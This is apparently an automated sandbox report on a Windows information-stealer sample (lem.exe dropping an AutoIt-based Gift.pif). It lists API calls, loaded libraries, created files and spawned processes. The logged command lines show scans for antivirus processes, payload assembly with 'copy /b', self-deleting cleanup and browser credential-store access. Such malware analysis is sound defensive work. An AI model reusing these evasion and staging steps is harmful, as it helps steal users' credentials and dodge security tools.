Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00344830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00344632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0035D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00334254: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00328F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00335778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\PartnersEdinburgh
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\JustRun
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\StatutoryIm
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\AcquireMotivation
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\RegulatedVerse
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\GenomeNeither
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\DesireBattle
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\SympathySatisfied
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\AnalogProc
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\QuestionsDeviation
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\SequenceKnew
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\WitnessesGeometry
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\EuroTech
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\ColorDrums
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\ThrownJazz
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\ScreenMeetings
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\CurvesPursuit
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\TracySemiconductor
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\IeeeEgypt
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\PreviousWearing
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\DressThickness
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\MultipleSurrounding
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Windows\TowersZoophilia
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: String function: 002F0D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: String function: 002F8B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: String function: 002E1A36 appears 34 times
Source: C:\Users\user\Desktop\lem.exe | Code function: String function: 004062A3 appears 58 times
Source: lem.exe | Static PE information: invalid certificate
Source: lem.exe, 00000000.00000003.2031229309.000000000293B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAutoIt3.exeB vs lem.exe
Source: lem.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: lem.exe | Static PE information: Section: .reloc ZLIB complexity 1.002685546875
Source: GDAAKK.11.dr | Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@27/66@3/3
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033A6AD GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00328DE9 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00329399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_00334148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification
Source: C:\Users\user\Desktop\lem.exe | Code function: 0_2_004024FB CoCreateInstance
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Code function: 11_2_0033443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\76561199747278259[1].htm
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
Source: C:\Users\user\Desktop\lem.exe | File created: C:\Users\user\AppData\Local\Temp\nsbB483.tmp
                        Source: lem.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\timeout.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\lem.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: Gift.pif, 0000000B.00000002.3241733034.00000000310E7000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3251010993.000000006C54F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                        Source: AAKKEC.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: Gift.pif, 0000000B.00000002.3222647934.000000000C208000.00000002.00001000.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3222989934.000000000C64A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                        Source: Gift.pif, 0000000B.00000002.3235679571.0000000025208000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                        Source: lem.exeReversingLabs: Detection: 55%
                        Source: C:\Users\user\Desktop\lem.exeFile read: C:\Users\user\Desktop\lem.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\lem.exe "C:\Users\user\Desktop\lem.exe"
                        Source: C:\Users\user\Desktop\lem.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Uniform Uniform.cmd & Uniform.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 366791
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "TrailersTractOffersVenezuela" Mines
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Pending + Smith + Specifications + Resident 366791\M
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\366791\Gift.pif 366791\Gift.pif 366791\M
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5
                        Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pifProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\366791\Gift.pif" & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\lem.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: slc.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: sppc.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\lem.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\366791\Gift.pif | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\lem.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: lem.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Gift.pif, 0000000B.00000002.3229571283.0000000019329000.00000004.00000800.00020000.00000000.sdmp, Gift.pif, 0000000B.00000002.3250430219.000000006C38D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Gift.pif, 0000000B.00000002.3226753649.00000000133B2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
